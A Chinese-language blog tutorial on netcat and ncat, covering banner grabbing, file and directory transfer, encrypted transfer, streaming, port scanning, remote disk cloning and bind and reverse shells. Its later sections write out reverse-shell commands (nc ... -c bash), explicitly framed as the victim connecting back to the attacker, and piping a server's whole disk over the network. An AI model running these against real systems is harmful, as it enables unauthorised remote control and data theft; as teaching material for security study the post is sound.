Netcat-NC 工具的使用

netcat---网络工具中的“瑞士军刀”( 小身材,大智慧)

  • 侦听模式/ 传输模式
  • telnet /获取banner信息
    • nc -nv IP Port
    传输文本信息(可实现两台电脑的“聊天”)
    • A: nc -l -p 4444
    • B: nc -nv 1.1.1.1 4444
  • 传输文件/ 目录
  • 加密传输文件
  • 远程控制木马
  • 加密所有流量
  • 流媒体服务器
  • 远程克隆硬盘
root@bogon:~# nc -h
[v1.10-41.1]
connect to somewhere:    nc [-options] hostname port[s] [ports] ... 
listen for inbound:    nc -l -p port [-options] [hostname] [port]
options:
    -c shell commands    as `-e'; use /bin/sh to exec [dangerous!!]
    -e filename        program to exec after connect [dangerous!!]
    -b            allow broadcasts
    -g gateway        source-routing hop point[s], up to 8
    -G num            source-routing pointer: 4, 8, 12, ...
    -h            this cruft
    -i secs            delay interval for lines sent, ports scanned
        -k                      set keepalive option on socket
    -l            listen mode, for inbound connects
    -n            numeric-only IP addresses, no DNS
    -o file            hex dump of traffic
    -p port            local port number
    -r            randomize local and remote ports
    -q secs            quit after EOF on stdin and delay of secs
    -s addr            local source address
    -T tos            set Type Of Service
    -t            answer TELNET negotiation
    -u            UDP mode
    -v            verbose [use twice to be more verbose]
    -w secs            timeout for connects and final net reads
    -C            Send CRLF as line-ending
    -z            zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').
nc -h

远程电子取证的要求就是尽可能不破坏现场,在NC传输文本信息的基础上

对于服务端开启监听;
nc -l -p 4444
nc -l -p 4444 > nc.text
---------------------------
对于客户端开启命令传输:
①直接 nc -nv 192.168.56.134 4444
此时,这输入嘛,服务端就显示嘛。
② 执行命令后,将结果显示在服务端。
ls -l |nc -nv 192.168.56.134 4444
这样命令就显示在远程端了。
③ 远程端想将结果保存下来:
服务端这样:nc -l -p 4444 > nc.text
客户端这样:ls -al |nc -nv 192.168.56.134 4444

root@bogon:~# ps aux |nc -nv 192.168.56.134 4444 -q 1
(UNKNOWN) [192.168.56.134] 4444 (?) open
这个 -q 1 是说命令执行完等1s就退出。

 传输文件和目录这样:

 A:nc -lp 333 > 1.mp4
 B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1
 或
 A:nc -q 1 -lp 333 < a.mp4
 B: nc -nv 1.1.1.1 333 > 2.mp4

• 传输目录
A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf – • 加密传文件 A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4 B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
#需要先安装下mcrypt

流媒体服务这样:

A: cat 1.mp4 | nc -lp 3333
B: nc -lp 1.1.1.1 3333 | mplayer -vo x11 -cache 3000 -
#mplayer需要自行安装,也可以其他软件,管道过来播放就行

端口扫描(简单的)

nc -nvz 1.1.1.1 1-65535  //TCP
nc –nvzu 1.1.1.1 1-102   //UDP

远程克隆硬盘

A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1 
#远程电⼦子取证,可以将目标服务器硬盘远程复制,或者内存。

 远程控制(..反弹shell)

正向:
服务器开监听端口并启动bash,客户端来连接。
 A:nc -lp 333 -c bash
 B:nc 1.1.1.1 333 

反向:
服务器开启监听端口等着,客户端来连接启动bash,把自己的bash主动反弹过来
 A:nc -lp 333
 B:nc 1.1.1.1 333 -c bash

#注:Windows⽤用户把bash改成cmd
#反向的是攻击端自己开个服务监听,让被害端连过来

NC—与—NCAT

• Nc缺乏加密和⾝份验证的能⼒

Ncat包含在nmap⼯工具包中

A:ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
B:ncat -nv 1.1.1.1 333 --ssl

ncat的管道加密

 #不同系统/平台的NC参数功能不尽相同。例如Ubuntu...

posted @ 2020-01-28 14:01  香农Shannon  阅读(714)  评论(0编辑  收藏  举报